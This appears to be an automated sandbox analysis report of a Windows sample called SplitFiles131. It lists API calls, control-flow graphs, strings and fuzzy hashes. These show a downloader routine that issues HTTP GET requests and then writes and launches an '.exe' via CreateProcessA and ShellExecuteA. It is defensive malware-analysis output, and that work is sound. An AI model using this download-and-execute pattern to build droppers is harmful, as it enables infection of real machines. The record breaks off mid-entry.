                                          • FindCloseChangeNotification.KERNEL32(00000000,?,?), ref: 004053C2
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 3243318325-0
                                          • Opcode ID: 8135d8b86f741ced22b6e495a0d61fe9958d4fa32e71604d153aa300f03aaae6
                                          • Instruction ID: 5e486a24114f457a1f86916b08eb67cf77cbee6b56fc5b3387bb74bba5914992
                                          • Opcode Fuzzy Hash: 8135d8b86f741ced22b6e495a0d61fe9958d4fa32e71604d153aa300f03aaae6
                                          • Instruction Fuzzy Hash: 7C21F031200118ABDB20DF26DD45BEF37A9EB45345F50057AE805E6281EB78DA82CFA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetCurrentProcess.KERNEL32(0041CC1F,?,00417BAE,00000000,?,0041CC1F,00000000,0041CC1F), ref: 00417BD1
                                          • TerminateProcess.KERNEL32(00000000,?,00417BAE,00000000,?,0041CC1F,00000000,0041CC1F), ref: 00417BD8
                                          • ExitProcess.KERNEL32 ref: 00417BEA
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CurrentExitTerminate
                                          • String ID:
                                          • API String ID: 1703294689-0
                                          • Opcode ID: ed8121747a5916c0d4d7e76e5998f8eb11bb96fe12b92581084defb0bd95f10c
                                          • Instruction ID: 57c928e6e796ec7aea49f19cfabf78c9b525272d76e34185ca50371a21d47389
                                          • Opcode Fuzzy Hash: ed8121747a5916c0d4d7e76e5998f8eb11bb96fe12b92581084defb0bd95f10c
                                          • Instruction Fuzzy Hash: 5CE04631108148AFCB212F66DC09EA93B79FB04389B508839F90586231CB39EC93CA88
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32(Function_0000F795,0040F328), ref: 0040F78E
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: 1d47e3287a5f49425792cbec75295ec78f4a03d4d2f0f0eea672fc119a570182
                                          • Instruction ID: c441ddb958a20976f8478718b12c4a1fde45198c9b197ccf8dba8fb5fcb3ec3f
                                          • Opcode Fuzzy Hash: 1d47e3287a5f49425792cbec75295ec78f4a03d4d2f0f0eea672fc119a570182
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 10001010-1000104d 1 10001079-1000107c 0->1 2 1000104f-10001077 call 1000320d 0->2 4 10001082-1000109b InternetSetFilePointer 1->4 2->4 6 100010a0-100010d3 InternetReadFile 4->6 7 100010d5-10001107 call 1000320d call 10005bc0 call 10003224 6->7 8 1000110d-1000110f 6->8 7->8 10 10001111-10001113 8->10 11 10001115-10001150 call 10004730 HttpQueryInfoA 8->11 10->6 10->11 17 100014b5-100014e3 call 100031ff 11->17 18 10001156-10001189 CoCreateInstance 11->18 18->17 21 1000118f-10001196 18->21 21->17 24 1000119c-100011ca 21->24 25 100011d0-100011d5 24->25 25->25 26 100011d7-10001298 call 10001970 MultiByteToWideChar call 1000320d MultiByteToWideChar 25->26 31 100012a0-100012a9 26->31 31->31 32 100012ab-10001305 call 10001aa0 call 10003224 31->32 38 10001307-1000131c 32->38 39 1000133c-10001369 32->39 42 10001332-10001339 call 10003216 38->42 43 1000131e-1000132c 38->43 40 1000139a-1000139c 39->40 41 1000136b-1000137a 39->41 47 100013a2-100013a9 40->47 48 100014a9-100014b0 40->48 45 10001390-10001397 call 10003216 41->45 46 1000137c-1000138a 41->46 42->39 43->42 49 100014e6-1000153e call 1000633c 43->49 45->40 46->45 46->49 47->48 53 100013af-10001423 call 1000320d 47->53 48->17 59 10001542-10001547 49->59 63 10001425-10001433 53->63 64 1000148f-100014a5 call 10003224 53->64 59->59 60 10001549-10001570 call 10001970 59->60 71 10001576-10001590 call 1000f670 60->71 72 10001649-10001656 60->72 65 10001435-1000146b call 1000320d call 10001c00 call 10003224 63->65 66 1000146d 63->66 64->48 70 10001470-1000148c call 10001c00 65->70 66->70 70->64 71->72 87 10001596 71->87 75 10001658-10001668 call 1000f670 72->75 76 1000166e 72->76 75->76 90 1000166a-1000166c 75->90 81 10001671-10001710 call 10001970 call 10005bc0 call 10006419 InternetOpenA 76->81 106 10001716-10001757 InternetSetOptionA InternetConnectA 81->106 107 100018ac-100018b9 81->107 88 100015a0-100015b0 87->88 92 100015b2-100015b8 88->92 93 100015bb-100015bf 88->93 90->81 92->93 96 100015c1-100015c7 93->96 97 100015e2-100015e4 93->97 96->97 99 100015c9-100015cf 96->99 100 100015e7-100015e9 97->100 99->97 102 100015d1-100015d4 99->102 103 10001605-1000160b 100->103 104 100015eb-10001601 call 1000f670 100->104 108 100015d6-100015dc 102->108 109 100015de-100015e0 102->109 103->72 111 1000160d-1000160f 103->111 104->88 125 10001603 104->125 114 100018a9-100018aa InternetCloseHandle 106->114 115 1000175d-10001783 HttpOpenRequestA 106->115 116 100018e3-100018fb 107->116 117 100018bb-100018c7 107->117 108->97 108->109 109->100 112 10001945 call 10001960 111->112 113 10001615-10001646 call 10005bc0 111->113 131 1000194a call 1000633c 112->131 113->72 114->107 120 100018a1-100018a6 InternetCloseHandle 115->120 121 10001789-1000184e call 10001970 HttpAddRequestHeadersA call 10001970 HttpAddRequestHeadersA call 10001970 HttpAddRequestHeadersA call 10001970 HttpAddRequestHeadersA 115->121 126 10001925-10001942 call 100031ff 116->126 127 100018fd-10001909 116->127 123 100018d9-100018e0 call 10003216 117->123 124 100018c9-100018d7 117->124 120->114 153 10001850-1000185c 121->153 154 1000187c-1000188d HttpSendRequestA 121->154 123->116 124->123 132 1000194f-1000196a call 1000633c call 100031df 124->132 125->72 134 1000191b-10001922 call 10003216 127->134 135 1000190b-10001919 127->135 131->132 134->126 135->132 135->134 157 10001872-10001879 call 10003216 153->157 158 1000185e-1000186c 153->158 155 1000189b-1000189e InternetCloseHandle 154->155 156 1000188f-10001893 call 10001010 154->156 155->120 161 10001898 156->161 157->154 158->131 158->157 161->155
                                          APIs
                                          • InternetSetFilePointer.WININET(10001898,00000000,00000000,00000000,00000000), ref: 10001095
                                          • InternetReadFile.WININET(10001898,00000000,000003E8,00000000), ref: 100010B4
                                          • HttpQueryInfoA.WININET(10001898,0000001D,?,00000103,00000000), ref: 10001148
                                          • CoCreateInstance.OLE32(?,00000000,00000001,100101B0,?), ref: 10001181
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,?,?), ref: 10001224
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000), ref: 1000126A
                                          • __cftof.LIBCMT ref: 100016EA
                                          • InternetOpenA.WININET(?,?,?,00000000,00000000), ref: 10001703
                                          • InternetSetOptionA.WININET(00000000,00000041,?,00000004), ref: 10001726
                                          • InternetConnectA.WININET(00000000,00000000,00000050,?,?,00000003,00000000,00000001), ref: 10001746
                                          • HttpOpenRequestA.WININET(00000000,GET,00000000,00000000,00000000,00000000,80400000,00000001), ref: 10001779
                                          • HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,20000000), ref: 100017D0
                                          • HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,20000000), ref: 100017F6
                                          • HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,20000000), ref: 1000181C
                                          • HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,20000000), ref: 10001842
                                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 10001885
                                          • InternetCloseHandle.WININET(00000000), ref: 1000189C
                                          • InternetCloseHandle.WININET(?), ref: 100018A4
                                          • InternetCloseHandle.WININET(00000000), ref: 100018AA
                                          Strings
                                          • http://, xrefs: 100015A2
                                          • text, xrefs: 100012EC
                                          • GET, xrefs: 10001773
                                          • invalid string position, xrefs: 10001960
                                          • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 10001795
                                          • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 100017D4
                                          • pYhv, xrefs: 100016CE, 1000188F
                                          • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 10001820
                                          • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 100017FA
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd
                                          Similarity
                                          • API ID: Internet$Http$Request$Headers$CloseHandle$ByteCharFileMultiOpenWide$ConnectCreateInfoInstanceOptionPointerQueryReadSend__cftof
                                          • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$http://$invalid string position$pYhv$text
                                          • API String ID: 3831252183-3393006363
                                          • Opcode ID: 928840d67b81dec85a459f9b0e9ad04d7454cd60734cdd5e754f0154346cdfd8
                                          • Instruction ID: 9cfefb4acadf1673c11eeb4d9e0c75330180c00a45bf6efb74ded1e1255f97de
                                          • Opcode Fuzzy Hash: 928840d67b81dec85a459f9b0e9ad04d7454cd60734cdd5e754f0154346cdfd8
                                          • Instruction Fuzzy Hash: 7D52B171E00218AFEB25CF68CC85BEEB7B9FF48340F504198E509AB295DB75AA45CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 446 100014f0-1000153e 447 10001542-10001547 446->447 447->447 448 10001549-10001570 call 10001970 447->448 451 10001576-10001590 call 1000f670 448->451 452 10001649-10001656 448->452 451->452 461 10001596 451->461 453 10001658-10001668 call 1000f670 452->453 454 1000166e 452->454 453->454 463 1000166a-1000166c 453->463 457 10001671-10001710 call 10001970 call 10005bc0 call 10006419 InternetOpenA 454->457 478 10001716-10001757 InternetSetOptionA InternetConnectA 457->478 479 100018ac-100018b9 457->479 462 100015a0-100015b0 461->462 465 100015b2-100015b8 462->465 466 100015bb-100015bf 462->466 463->457 465->466 468 100015c1-100015c7 466->468 469 100015e2-100015e4 466->469 468->469 471 100015c9-100015cf 468->471 472 100015e7-100015e9 469->472 471->469 474 100015d1-100015d4 471->474 475 10001605-1000160b 472->475 476 100015eb-10001601 call 1000f670 472->476 480 100015d6-100015dc 474->480 481 100015de-100015e0 474->481 475->452 483 1000160d-1000160f 475->483 476->462 497 10001603 476->497 486 100018a9-100018aa InternetCloseHandle 478->486 487 1000175d-10001783 HttpOpenRequestA 478->487 488 100018e3-100018fb 479->488 489 100018bb-100018c7 479->489 480->469 480->481 481->472 484 10001945 call 10001960 483->484 485 10001615-10001646 call 10005bc0 483->485 503 1000194a call 1000633c 484->503 485->452 486->479 492 100018a1-100018a6 InternetCloseHandle 487->492 493 10001789-1000184e call 10001970 HttpAddRequestHeadersA call 10001970 HttpAddRequestHeadersA call 10001970 HttpAddRequestHeadersA call 10001970 HttpAddRequestHeadersA 487->493 498 10001925-10001942 call 100031ff 488->498 499 100018fd-10001909 488->499 495 100018d9-100018e0 call 10003216 489->495 496 100018c9-100018d7 489->496 492->486 525 10001850-1000185c 493->525 526 1000187c-1000188d HttpSendRequestA 493->526 495->488 496->495 504 1000194f-1000196a call 1000633c call 100031df 496->504 497->452 506 1000191b-10001922 call 10003216 499->506 507 1000190b-10001919 499->507 503->504 506->498 507->504 507->506 529 10001872-10001879 call 10003216 525->529 530 1000185e-1000186c 525->530 527 1000189b-1000189e InternetCloseHandle 526->527 528 1000188f-10001893 call 10001010 526->528 527->492 533 10001898 528->533 529->526 530->503 530->529 533->527
                                          Strings
                                          • http://, xrefs: 100015A2
                                          • GET, xrefs: 10001773
                                          • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 10001795
                                          • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 100017D4
                                          • pYhv, xrefs: 100016CE, 1000188F
                                          • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 10001820
                                          • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 100017FA
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$http://$pYhv
                                          • API String ID: 0-4268195717
                                          • Opcode ID: d3ed00dd38609a7697d672608ec4d1622f700f7468701cf831d89b042d405c33
                                          • Instruction ID: 3e25db80656cceb02cc8fd81e0400d570f0dd4959431d348fe5b88a2f33083bb
                                          • Opcode Fuzzy Hash: d3ed00dd38609a7697d672608ec4d1622f700f7468701cf831d89b042d405c33
                                          • Instruction Fuzzy Hash: 86D1C231E00208AFEB11CFA8CC95FEEBBB9EF45390F644118F515AB295C775AA45CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1414 40ee60-40ee81 InitializeCriticalSectionAndSpinCount GetModuleHandleW 1415 40ee83-40ee92 GetModuleHandleW 1414->1415 1416 40ee94-40eeb0 GetProcAddress * 2 1414->1416 1415->1416 1417 40eeda-40eef4 call 40f5f5 DeleteCriticalSection 1415->1417 1418 40eeb2-40eeb4 1416->1418 1419 40eec4-40eed8 CreateEventW 1416->1419 1424 40eef6-40eef7 CloseHandle 1417->1424 1425 40eefd 1417->1425 1418->1419 1420 40eeb6-40eebc 1418->1420 1419->1417 1421 40eec1-40eec3 1419->1421 1420->1421 1424->1425
                                          APIs
                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(004504FC,00000FA0,?,?,0040EE3E), ref: 0040EE6C
                                          • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,0040EE3E), ref: 0040EE77
                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,0040EE3E), ref: 0040EE88
                                          • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0040EE9A
                                          • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0040EEA8
                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,0040EE3E), ref: 0040EECB
                                          • DeleteCriticalSection.KERNEL32(004504FC,00000007,?,?,0040EE3E), ref: 0040EEE7
                                          • CloseHandle.KERNEL32(00000000,?,?,0040EE3E), ref: 0040EEF7
                                          Strings
                                          • api-ms-win-core-synch-l1-2-0.dll, xrefs: 0040EE72
                                          • kernel32.dll, xrefs: 0040EE83
                                          • SleepConditionVariableCS, xrefs: 0040EE94
                                          • WakeAllConditionVariable, xrefs: 0040EEA0
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                          • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                          • API String ID: 2565136772-3242537097
                                          • Opcode ID: 6a30901e0316293d9dd8d087d713a46f6d2382c1dc1a8c068fa87155fa23cfe1
                                          • Instruction ID: 0577adb6b1f793cc774404ca345485d9f3401ded944aeed88ccdd136dffad262
                                          • Opcode Fuzzy Hash: 6a30901e0316293d9dd8d087d713a46f6d2382c1dc1a8c068fa87155fa23cfe1
                                          • Instruction Fuzzy Hash: 38019234740325ABD7305B73EC09B373AA8AB41B027940836FD04E22D1DA78CC1286AD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401A67
                                          • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401A8D
                                            • Part of subcall function 004026B0: Concurrency::cancel_current_task.LIBCPMT ref: 004027E3
                                          • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401AB3
                                          • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401AD9
                                          Strings
                                          • text, xrefs: 00401E0C
                                          • pYhv, xrefs: 00402165, 00402238
                                          • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 00401AB7
                                          • GET, xrefs: 0040220D
                                          • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 00401A91
                                          • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 00401A6B
                                          • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 00401A29
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HeadersHttpRequest$Concurrency::cancel_current_task
                                          • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$pYhv$text
                                          • API String ID: 2146599340-343719610
                                          • Opcode ID: fcad180c4c3fe079648477ce6e35f16694a51aef3eb89b63915f875012574e84
                                          • Instruction ID: 621c8db50826d68fbf5915584c3f353caeca61d3b6748355fd6bd9a3799d1aaf
                                          • Opcode Fuzzy Hash: fcad180c4c3fe079648477ce6e35f16694a51aef3eb89b63915f875012574e84
                                          • Instruction Fuzzy Hash: EF316F31E00109EBEB15DFA9CC85FEEBBB9EB48714F60C02AE121761C0D779A544CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2752 10002450-10002514 call 10006436 call 100064b5 call 10004730 call 1000320d call 10004730 2763 10002516-1000251f call 10003224 2752->2763 2764 1000252a-10002539 call 100014f0 2752->2764 2763->2764 2769 100029b4 2764->2769 2770 1000253f-10002547 2764->2770 2773 100029b9-10002a01 call 10003224 * 3 CoUninitialize call 100031ff 2769->2773 2771 100029b0-100029b2 2770->2771 2772 1000254d-10002556 2770->2772 2771->2773 2772->2771 2774 1000255c-1000255f 2772->2774 2774->2771 2776 10002565-1000256a 2774->2776 2779 10002570-1000257e call 10001f90 2776->2779 2780 100029ab-100029ae 2776->2780 2786 10002972 2779->2786 2787 10002584-100025b9 call 10006494 call 10001eb0 call 10002bc0 2779->2787 2780->2773 2789 10002977-1000297e 2786->2789 2805 100025d9-100025f0 call 10002e00 2787->2805 2806 100025bb-100025c6 2787->2806 2789->2773 2792 10002980-1000298d 2789->2792 2795 1000299f-100029a9 call 10003216 2792->2795 2796 1000298f-1000299d 2792->2796 2795->2773 2796->2795 2798 10002a11-10002a16 call 1000633c 2796->2798 2810 100025f2-10002641 2805->2810 2807 100025c8 2806->2807 2808 100025ca-100025d7 2806->2808 2807->2808 2808->2810 2812 10002643-10002672 call 10005bc0 2810->2812 2813 10002674-1000268b call 10002e00 2810->2813 2818 1000268d-100026b0 2812->2818 2813->2818 2819 100026b2 2818->2819 2820 100026b4-100026b7 2818->2820 2819->2820 2821 100026d2-100026f5 2820->2821 2822 100026b9-100026cd 2820->2822 2824 100026f7-100026fc 2821->2824 2825 1000271e-10002720 2821->2825 2823 10002755-1000275f 2822->2823 2826 10002761-1000276c 2823->2826 2827 1000278c-10002793 2823->2827 2828 10002a02 call 10001de0 2824->2828 2829 10002702-1000270d call 10003229 2824->2829 2830 10002722-1000272d call 10003229 2825->2830 2831 1000272f 2825->2831 2833 10002782-10002789 call 10003216 2826->2833 2834 1000276e-1000277c 2826->2834 2837 100027c2-100027de 2827->2837 2838 10002795-100027a2 2827->2838 2843 10002a07 call 1000633c 2828->2843 2829->2843 2856 10002713-1000271c 2829->2856 2832 10002731-10002751 call 10005bc0 2830->2832 2831->2832 2832->2823 2833->2827 2834->2833 2834->2843 2840 100027e0-100027ed 2837->2840 2841 1000280d-10002823 2837->2841 2846 100027a4-100027b2 2838->2846 2847 100027b8-100027bf call 10003216 2838->2847 2849 10002803-1000280a call 10003216 2840->2849 2850 100027ef-100027fd 2840->2850 2852 10002825-1000282d 2841->2852 2853 1000287a-1000290a CreateProcessA 2841->2853 2862 10002a0c call 1000633c 2843->2862 2846->2843 2846->2847 2847->2837 2849->2841 2850->2843 2850->2849 2852->2853 2859 1000282f-1000284d CreateFileA 2852->2859 2860 10002913-1000292f ShellExecuteA 2853->2860 2861 1000290c-10002911 2853->2861 2856->2832 2859->2853 2865 1000284f-10002874 WriteFile CloseHandle 2859->2865 2866 10002935-1000293c 2860->2866 2861->2860 2861->2866 2862->2798 2865->2853 2868 1000296b-10002970 2866->2868 2869 1000293e-1000294b 2866->2869 2868->2789 2870 10002961-10002968 call 10003216 2869->2870 2871 1000294d-1000295b 2869->2871 2870->2868 2871->2862 2871->2870
                                          APIs
                                            • Part of subcall function 10006436: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,10002479,00000000), ref: 10006449
                                            • Part of subcall function 10006436: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1000647A
                                          • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 10002842
                                          • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 1000286D
                                          • CloseHandle.KERNEL32(00000000), ref: 10002874
                                          • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 10002902
                                          • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,0000000A), ref: 1000292F
                                          • CoUninitialize.OLE32 ref: 100029E6
                                          • Concurrency::cancel_current_task.LIBCPMT ref: 10002A02
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd
                                          Similarity
                                          • API ID: File$CreateTime$CloseConcurrency::cancel_current_taskExecuteHandleProcessShellSystemUninitializeUnothrow_t@std@@@Write__ehfuncinfo$??2@
                                          • String ID: .exe$D$open
                                          • API String ID: 486856157-1167955346
                                          • Opcode ID: 94542779c2cbe68dcfa0da88a96b167bcfe548502e27a71f2e7a21729ccdced1
                                          • Instruction ID: a5dc631b58f12eb130fcfc4579c604e67e83b8f68047a22d4781f4a2ecc51844
                                          • Opcode Fuzzy Hash: 94542779c2cbe68dcfa0da88a96b167bcfe548502e27a71f2e7a21729ccdced1
                                          • Instruction Fuzzy Hash: 2CE1E2716083809BF724CB24CC45B9FB7E5FF85380F108A2CF599962D5DBB1E9848B92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2874 4286be-4286ee call 42840c 2877 4286f0-4286fb call 4135de 2874->2877 2878 428709-428715 call 42540e 2874->2878 2883 4286fd-428704 call 4135f1 2877->2883 2884 428717-42872c call 4135de call 4135f1 2878->2884 2885 42872e-428777 call 428377 2878->2885 2894 4289e3-4289e7 2883->2894 2884->2883 2892 4287e4-4287ed GetFileType 2885->2892 2893 428779-428782 2885->2893 2898 428836-428839 2892->2898 2899 4287ef-428820 GetLastError call 4135bb CloseHandle 2892->2899 2896 428784-428788 2893->2896 2897 4287b9-4287df GetLastError call 4135bb 2893->2897 2896->2897 2903 42878a-4287b7 call 428377 2896->2903 2897->2883 2901 428842-428848 2898->2901 2902 42883b-428840 2898->2902 2899->2883 2913 428826-428831 call 4135f1 2899->2913 2906 42884c-42889a call 425359 2901->2906 2907 42884a 2901->2907 2902->2906 2903->2892 2903->2897 2917 4288b9-4288e1 call 428124 2906->2917 2918 42889c-4288a8 call 428586 2906->2918 2907->2906 2913->2883 2923 4288e3-4288e4 2917->2923 2924 4288e6-428927 2917->2924 2918->2917 2925 4288aa 2918->2925 2926 4288ac-4288b4 call 41ec93 2923->2926 2927 428948-428956 2924->2927 2928 428929-42892d 2924->2928 2925->2926 2926->2894 2930 4289e1 2927->2930 2931 42895c-428960 2927->2931 2928->2927 2929 42892f-428943 2928->2929 2929->2927 2930->2894 2931->2930 2933 428962-428995 CloseHandle call 428377 2931->2933 2937 428997-4289c3 GetLastError call 4135bb call 425521 2933->2937 2938 4289c9-4289dd 2933->2938 2937->2938 2938->2930
                                          APIs
                                            • Part of subcall function 00428377: CreateFileW.KERNEL32(00000000,00000000,?,00428767,?,?,00000000,?,00428767,00000000,0000000C), ref: 00428394
                                          • GetLastError.KERNEL32 ref: 004287D2
                                          • __dosmaperr.LIBCMT ref: 004287D9
                                          • GetFileType.KERNEL32(00000000), ref: 004287E5
                                          • GetLastError.KERNEL32 ref: 004287EF
                                          • __dosmaperr.LIBCMT ref: 004287F8
                                          • CloseHandle.KERNEL32(00000000), ref: 00428818
                                          • CloseHandle.KERNEL32(0041E0F8), ref: 00428965
                                          • GetLastError.KERNEL32 ref: 00428997
                                          • __dosmaperr.LIBCMT ref: 0042899E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                          • String ID: H
                                          • API String ID: 4237864984-2852464175
                                          • Opcode ID: cdf5ef2873a73ee89aeb392416d28c2a8e100c1643c37962a50c484033c6f312
                                          • Instruction ID: 1e70075c2325eb26896e542e756e04c6963ea449c89895b1e211c5b43069dcbf
